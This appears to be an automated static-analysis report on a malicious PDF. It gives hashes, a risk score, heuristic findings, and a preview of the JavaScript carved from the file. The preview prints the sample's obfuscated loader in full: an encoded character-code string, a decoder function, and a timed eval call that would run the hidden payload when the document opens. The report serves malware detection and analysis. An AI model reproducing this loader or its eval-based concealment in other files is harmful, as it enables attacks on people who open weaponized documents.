Malicious PDF — malware analysis report

Static analysis result for SHA-256 3cfaccc4d2b76941…

MALICIOUS

PDF

37.5 KB Created: 2010-04-12 17:50:08 +04:00 Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org)) First seen: 2026-05-10
MD5: 82b5485ddeabfc044ceb03f1c617593d SHA-1: 33f6a9116eb2eb7cfa28df38129cdb92d15272b9 SHA-256: 3cfaccc4d2b769419d88961d486a657a0fa868e0bef4427a0bb49b6db4b89e6b
74 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x70A4 8330 bytes
SHA-256: 2cead8b384b8f6d7cf4281e97cdbcd12393601cfa6fbd5d1ebad226b169087c9
Preview script
First 1,000 lines of the extracted script
�� 
 v a r   E y y R x b i   =   ' 2 5 1 I 2 6 6 q 2 5 9 A 2 4 8 X 2 6 5 p 2 5 4 K 2 6 0 q 2 5 9 G 1 8 1 M 2 4 9 X 2 5 0 t 2 4 8 U 2 6 0 M 2 4 9 k 2 5 0 z 2 4 4 g 2 4 7 w 2 5 4 C 2 6 1 o 1 8 9 a 2 5 0 L 2 5 9 e 2 4 8 r 2 4 4 Z 2 6 4 I 2 6 5 A 2 6 3 V 1 9 0 y 1 5 9 A 2 7 2 X 1 5 9 d 1 8 1 I 1 8 1 O 1 8 1 d 1 8 1 g 2 6 7 E 2 4 6 o 2 6 3 X 1 8 1 K 2 4 6 A 2 6 3 v 1 8 1 D 2 1 0 V 1 8 1 H 2 5 9 o 2 5 0 V 2 6 8 o 1 8 1 l 2 1 4 Y 2 6 3 d 2 6 3 L 2 4 6 j 2 7 0 H 1 8 9 D 1 9 0 I 2 0 8 P 1 5 9 E 1 8 1 e 1 8 1 O 1 8 1 E 1 8 1 C 2 4 6 r 2 6 3 N 1 8 1 R 2 1 0 V 1 8 1 u 2 5 0 V 2 5 9 J 2 4 8 R 2 4 4 g 2 6 4 K 2 6 5 N 2 6 3 k 1 9 5 f 2 6 4 U 2 6 1 Y 2 5 7 B 2 5 4 J 2 6 5 K 1 8 9 Z 1 8 8 m 2 0 8 V 1 8 8 J 1 9 0 u 2 0 8 Z 1 5 9 R 1 8 1 J 1 8 1 d 1 8 1 w 1 8 1 Y 2 6 7 i 2 4 6 z 2 6 3 P 1 8 1 w 2 5 9 Q 2 6 0 k 2 6 1 q 1 8 1 m 2 1 0 u 1 8 1 I 1 8 8 T 1 8 8 E 2 0 8 V 1 5 9 D 1 8 1 k 1 8 1 q 1 8 1 c 1 8 1 l 2 5 1 A 2 6 0 m 2 6 3 K 1 8 9 m 2 5 4 I 1 8 1 T 2 1 0 h 1 8 1 h 1 9 7 l 2 0 8 q 2 5 4 L 1 8 1 i 2 0 9 P 1 8 1 t 2 4 6 i 2 6 3 e 1 9 5 p 2 5 7 z 2 5 0 P 2 5 9 g 2 5 2 l 2 6 5 J 2 5 3 p 2 0 8 F 2 5 4 O 1 9 2 L 1 9 2 I 1 9 0 y 1 8 1 B 2 7 2 l 1 5 9 k 1 5 8 B 2 5 9 Y 2 6 0 v 2 6 1 o 1 9 2 g 2 1 0 P 2 3 2 V 2 6 5 O 2 6 3 B 2 5 4 M 2 5 9 Z 2 5 2 j 1 9 5 b 2 5 1 T 2 6 3 S 2 6 0 G 2 5 8 J 2 1 6 R 2 5 3 V 2 4 6 q 2 6 3 D 2 1 6 f 2 6 0 f 2 4 9 I 2 5 0 u 1 8 9 q 2 4 6 R 2 6 3 s 2 4 0 r 2 5 4 C 2 4 2 d 1 9 0 t 2 0 8 a 1 5 9 Y 1 8 1 i 1 8 1 H 1 8 1 n 1 8 1 E 2 7 4 V 1 5 9 o 1 8 1 R 1 8 1 v 1 8 1 Y 1 8 1 t 2 6 3 P 2 5 0 q 2 6 5 z 2 6 6 Y 2 6 3 H 2 5 9 V 1 8 1 O 2 5 9 K 2 6 0 B 2 6 1 t 2 0 8 T 1 5 9 v 2 7 4 k 1 5 9 k 1 5 9 o 2 5 1 c 2 6 6 m 2 5 9 R 2 4 8 V 2 6 5 N 2 5 4 q 2 6 0 E 2 5 9 V 1 8 1 d 2 4 8 J 2 5 3 r 2 5 0 S 2 4 8 a 2 5 6 m 2 4 4 q 2 6 3 T 2 6 6 B 2 5 9 g 1 8 9 T 1 9 0 a 1 5 9 o 2 7 2 p 1 5 9 p 1 8 1 z 1 8 1 q 1 8 1 i 1 8 1 S 2 6 5 m 2 5 3 T 2 5 4 C 2 6 4 b 1 9 5 v 2 6 4 p 2 7 0 s 2 5 9 R 2 4 8 D 2 1 4 i 2 5 9 V 2 5 9 Y 2 6 0 M 2 6 5 f 2 3 2 P 2 4 8 e 2 4 6 F 2 5 9 C 1 8 9 U 1 9 0 Z 2 0 8 E 1 5 9 B 1 8 1 t 1 8 1 e 1 8 1 p 1 8 1 i 2 6 7 T 2 4 6 p 2 6 3 Z 1 8 1 C 2 6 7 H 2 5 0 L 2 6 3 V 2 6 4 K 2 5 4 m 2 6 0 Q 2 5 9 z 1 8 1 f 2 1 0 h 1 8 1 D 2 4 6 O 2 6 1 D 2 6 1 b 1 9 5 b 2 6 7 i 2 5 4 r 2 5 0 F 2 6 8 o 2 5 0 u 2 6 3 a 2 3 5 O 2 5 0 y 2 6 3 c 2 6 4 H 2 5 4 d 2 6 0 S 2 5 9 p 1 9 5 x 2 6 5 H 2 6 0 O 2 3 2 z 2 6 5 O 2 6 3 a 2 5 4 V 2 5 9 Y 2 5 2 N 1 8 9 m 1 9 0 Y 2 0 8 t 1 5 9 U 1 8 1 b 1 8 1 H 1 8 1 Y 1 8 1 D 2 6 7 i 2 5 0 G 2 6 3 u 2 6 4 o 2 5 4 v 2 6 0 o 2 5 9 P 1 8 1 J 2 1 0 n 1 8 1 r 2 6 7 Q 2 5 0 Q 2 6 3 J 2 6 4 G 2 5 4 N 2 6 0 Q 2 5 9 V 1 9 5 N 2 6 3 f 2 5 0 w 2 6 1 j 2 5 7 D 2 4 6 J 2 4 8 V 2 5 0 c 1 8 9 C 1 9 6 p 2 4 1 D 2 1 7 K 1 9 6 N 2 5 2 G 1 9 3 t 1 8 1 U 1 8 3 B 1 8 3 h 1 9 0 Q 2 0 8 q 1 5 9 x 1 8 1 a 1 8 1 d 1 8 1 o 1 8 1 q 2 6 7 u 2 4 6 x 2 6 3 x 1 8 1 H 2 6 7 O 2 4 6 T 2 6 3 V 2 6 4 t 2 5 4 P 2 6 0 E 2 5 9 x 2 4 4 Y 2 4 6 Z 2 6 3 Z 2 6 3 b 2 4 6 P 2 7 0 d 1 8 1 m 2 1 0 d 1 8 1 k 2 5 9 f 2 5 0 y 2 6 8 l 1 8 1 N 2 1 4 O 2 6 3 b 2 6 3 K 2 4 6 o 2 7 0 F 1 8 9 y 2 6 7 f 2 5 0 z 2 6 3 w 2 6 4 d 2 5 4 H 2 6 0 K 2 5 9 w 1 9 5 c 2 4 8 E 2 5 3 L 2 4 6 h 2 6 3 B 2 1 4 k 2 6 5 G 1 8 9 b 1 9 7 M 1 9 0 W 1 9 3 F 1 8 1 y 2 6 7 z 2 5 0 p 2 6 3 d 2 6 4 y 2 5 4 a 2 6 0 r 2 5 9 M 1 9 5 C 2 4 8 B 2 5 3 B 2 4 6 I 2 6 3 A 2 1 4 h 2 6 5 H 1 8 9 w 1 9 8 K 1 9 0 P 1 9 3 H 1 8 1 H 2 6 7 s 2 5 0 M 2 6 3 S 2 6 4 Z 2 5 4 O 2 6 0 D 2 5 9 g 1 9 5 p 2 4 8 P 2 5 3 C 2 4 6 u 2 6 3 O 2 1 4 C 2 6 5 k 1 8 9 s 1 9 9 A 1 9 0 L 1 9 0 j 2 0 8 N 1 5 9 N 1 8 1 l 1 8 1 O 1 8 1 V 1 8 1 l 2 5 4 w 2 5 1 d 1 8 1 i 1 8 9 G 1 8 9 t 2 6 7 q 2 4 6 N 2 6 3 l 2 6 4 C 2 5 4 g 2 6 0 K 2 5 9 Q 2 4 4 k 2 4 6 q 2 6 3 G 2 6 3 A 2 4 6 s 2 7 0 B 2 4 0 O 1 9 7 u 2 4 2 l 1 8 1 G 2 0 9 v 1 8 1 w 2 0 5 p 1 9 0 I 1 8 1 K 2 7 3 a 2 7 3 W 1 8 1 g 1 8 9 M 2 6 7 T 2 4 6 K 2 6 3 v 2 6 4 Z 2 5 4 D 2 6 0 l 2 5 9 n 2 4 4 o 2 4 6 n 2 6 3 U 2 6 3 y 2 4 6 E 2 7 0 E 2 4 0 p 1 9 7 K 2 4 2 F 1 8 1 i 2 1 0 M 2 1 0 T 1 8 1 d 2 0 5 y 1 8 1 Z 1 8 7 Y 1 8 7 u 1 8 1 P 2 6 7 g 2 4 6 F 2 6 3 q 2 6 4 D 2 5 4 l 2 6 0 C 2 5 9 W 2 4 4 v 2 4 6 x 2 6 3 w 2 6 3 z 2 4 6 j 2 7 0 j 2 4 0 n 1 9 8 X 2 4 2 E 1 8 1 m 2 0 9 b 1 8 1 J 1 9 9 b 1 8 1 m 1 8 7 O 1 8 7 K 1 8 1 y 2 6 7 i 2 4 6 n 2 6 3 w 2 6 4 H 2 5 4 L 2 6 0 r 2 5 9 X 2 4 4 r 2 4 6 w 2 6 3 N 2 6 3 v 2 4 6 i 2 7 0 Q 2 4 0 R 1 9 9 e 2 4 2 O 1 8 1 N 2 0 9 d 1 8 1 x 1 9 9 x 1 9 0 R 1 9 0 U 1 8 1 C 2 7 2 E 1 5 9 w 1 5 8 L 2 6 7 g 2 4 6 i 2 6 3 a 1 8 1 q 2 4 6 h 2 5 9 I 2 5 9 d 1 8 1 e 2 1 0 Q 1 8 1 o 2 6 5 V 2 5 3 n 2 5 4 g 2 6 4 S 1 9 5 B 2 5 2 b 2 5 0 A 2 6 5 S 2 1 4 t 2 5 9 e 2 5 9 h 2 6 0 G 2 6 5 I 1 8 9 f 1 9 7 E 1 9 3 Z 1 8 1 z 1 8 3 G 1 9 7 d 1 9 7 w 1 9 7 S 1 9 8 J 1 9 4 e 1 9 7 t 1 9 7 A 1 9 7 M 1 9 8 B 1 8 3 d 1 9 0 q 2 0 8 S 1 8 1 S 1 5 9 L 1 5 8 G 2 6 7 y 2 4 6 d 2 6 3 I 1 8 1 a 2 4 7 e 2 5 4 a 2 6 1 T 1 8 1 I 2 1 0 I 1 8 1 a 1 8 8 R 1 8 8 n 2 0 8 e 1 5 9 q 1 5 8 n 2 5 4 l 2 5 1 U 1 8 9 j 1 8 1 E 2 4 6 e 2 5 9 O 2 5 9 x 1 8 1 e 1 8 2 a 2 1 0 z 1 8 1 I 2 5 9 Q 2 6 6 S 2 5 7 a 2 5 7 c 1 8 1 Y 1 9 0 Z 1 8 1 G 2 7 2 g 1 5 9 z 1 5 8 k 1 8 1 H 1 8 1 S 1 8 1 t 1 8 1 P 2 4 7 s 2 5 4 K 2 6 1 C 1 8 1 W 2 1 0 A 1 8 1 p 2 4 6 I 2 5 9 V 2 5 9 Z 1 9 5 M 2 6 4 A 2 6 6 n 2 4 7 K 2 5 5 e 2 5 0 O 2 4 8 J 2 6 5 n 2 0 8 e 1 5 9 b 1 5 8 N 2 7 4 H 1 5 9 A 1 5 8 m 2 5 9 N 2 5 4 h 2 6 1 l 1 8 1 x 2 1 0 o 1 8 1 D 2 4 9 q 2 5 0 E 2 4 8 w 2 6 0 A 2 4 9 H 2 5 0 T 2 4 4 B 2 4 7 w 2 5 4 b 2 6 1 W 1 8 9 W 2 4 7 o 2 5 4 X 2 6 1 J 1 9 0 y 2 0 8 B 1 5 9 X 1 5 8 I 2 5 0 o 2 6 7 C 2 4 6 k 2 5 7 C 1 8 9 J 2 5 9 k 2 5 4 p 2 6 1 W 1 9 0 S 2 0 8 a 1 5 9 U 1 8 1 G 1 8 1 e 1 8 1 L 1 8 1 L 2 7 4 b 1 8 1 L 2 5 0 S 2 5 7 u 2 6 4 N 2 5 0 P 1 8 1 V 2 7 2 k 1 5 9 l 1 5 8 J 2 6 7 H 2 4 6 u 2 6 3 I 1 8 1 I 2 4 6 S 2 5 9 Q 2 5 9 x 1 8 1 V 2 1 0 A 1 8 1 A 2 6 5 e 2 5 3 l 2 5 4 p 2 6 4 B 1 9 5 D 2 5 2 Q 2 5 0 W 2 6 5 K 2 1 4 v 2 5 9 h 2 5 9 V 2 6 0 W 2 6 5 t 1 8 9 n 1 9 7 Q 1 9 3 G 1 8 1 C 1 8 3 m 1 9 7 q 1 9 7 o 1 9 7 w 1 9 8 x 1 9 4 j 1 9 7 E 1 9 7 G 1 9 7 B 1 9 7 U 1 8 3 E 1 9 0 X 2 0 8 V 1 8 1 E 1 5 9 C 1 5 8 G 2 6 7 u 2 4 6 D 2 6 3 J 1 8 1 K 2 4 7 a 2 5 4 T 2 6 1 G 1 8 1 H 2 1 0 p 1 8 1 c 1 8 8 A 1 8 8 c 2 0 8 s 1 5 9 H 1 5 8 f 2 5 4 f 2 5 1 x 1 8 9 T 1 8 1 b 2 4 6 u 2 5 9 C 2 5 9 f 1 8 1 B 1 8 2 E 2 1 0 z 1 8 1 F 2 5 9 b 2 6 6 U 2 5 7 K 2 5 7 e 1 8 1 b 1 9 0 E 1 8 1 h 2 7 2 k 1 5 9 P 1 8 1 I 1 8 1 E 1 8 1 V 1 8 1 Q 1 5 8 t 1 8 1 x 1 8 1 R 1 8 1 W 1 8 1 q 2 4 7 Y 2 5 4 C 2 6 1 V 1 8 1 V 2 1 0 V 1 8 1 w 2 4 6 Q 2 5 9 Y 2 5 9 b 1 9 5 R 2 6 4 d 2 6 6 b 2 4 7 X 2 5 5 F 2 5 0 w 2 4 8 h 2 6 5 j 2 0 8 X 1 5 9 m 1 5 8 R 2 7 4 I 1 5 9 C 1 5 8 a 2 5 9 N 2 5 4 X 2 6 1 q 1 8 1 G 2 1 0 V 1 8 1 H 2 4 9 d 2 5 0 M 2 4 8 f 2 6 0 f 2 4 9 i 2 5 0 B 2 4 4 A 2 4 7 f 2 5 4 R 2 6 1 Z 1 8 9 H 2 4 7 j 2 5 4 D 2 6 1 j 1 9 0 H 2 0 8 I 1 5 9 f 1 5 8 p 2 5 0 s 2 6 7 D 2 4 6 c 2 5 7 K 1 8 9 L 2 5 9 e 2 5 4 k 2 6 1 Y 1 9 0 C 2 0 8 a 1 5 9 f 1 8 1 Y 1 8 1 h 1 8 1 I 1 8 1 k 2 7 4 N 1 5 9 n 2 7 4 T 1 5 9 O 1 5 9 o 2 4 6 y 2 6 1 g 2 6 1 N 1 9 5 G 2 4 6 Q 2 5 7 R 2 5 0 p 2 6 3 Y 2 6 5 a 1 8 9 U 1 8 8 N 1 9 8 S 1 8 8 X 1 9 0 p 2 0 8 d 1 5 9 j 2 4 8 U 2 5 3 N 2 5 0 H 2 4 8 W 2 5 6 o 2 4 4 m 2 6 3 u 2 6 6 W 2 5 9 v 1 8 9 f 1 9 0 j 2 0 8 i ' ; 
 v a r   l v 3 r O X G f u   =   1 4 9 ; 
 E y y R x b i   =     E y y R x b i . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' : ' ) ; 
 o b n E t z A 7   =   ' l v 3 r O X G f u ' ; 
 E y y R x b i   =     E y y R x b i . r e p l a c e ( / : : / g , ' ' ) ; 
 a p p . a l e r t ( E y y R x b i ) ; 
 f u n c t i o n   K d 6 D R 5 m q M 5 R f   (   x b b E g 4 t s F w s i ,   U c e S l j T P S h 8 d   )   {   v a r   m S T O q   =   n e w   S t r i n g ( ) ; v a r   t X H V I B w C n c   =   n e w   S t r i n g ( ) ; 
 K m b J j   =   x b b E g 4 t s F w s i   . s p l i t ( ' : ' ) ; 
 f o r ( x 2 o 9 4 g X b   =   0 ;   x 2 o 9 4 g X b   <   K m b J j . l e n g t h - 1 ; x 2 o 9 4 g X b + + )   {   l C W f e z 4 V =   S t r i n g [ ' f r o m C h a r C o d e ' ] ( K m b J j [ x 2 o 9 4 g X b ]   -   U c e S l j T P S h 8 d ) ; ; 
 t X H V I B w C n c   =   t X H V I B w C n c   +   l C W f e z 4 V ; }   r e t u r n   t X H V I B w C n c ; } ; 
 o b n E t z A 7   =   K d 6 D R 5 m q M 5 R f ( E y y R x b i , l v 3 r O X G f u ) ; 
 v a r   P n y Y O H I b   =   ' a ' ; 
 v a r   Y 8 k M n H y k   =   ' u ' ; 
 g B 3 z T 1 j w V 0 5 1   =     a p p [ ' s e t ' + ' T i m e O '   +   Y 8 k M n H y k   + ' t ' ] ( " e v " + P n y Y O H I b + " l ( o b n E t z A 7 ) " ,   1 ) ;
stream_001_off000070a4.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x70A4 4164 bytes
SHA-256: 3346b5dc67de4be3d067da80c1c67c2943b7ec5b420e3fd10dfd840f4ecd1805
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'I266q259A248X265p254K260q259G181M249X250') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.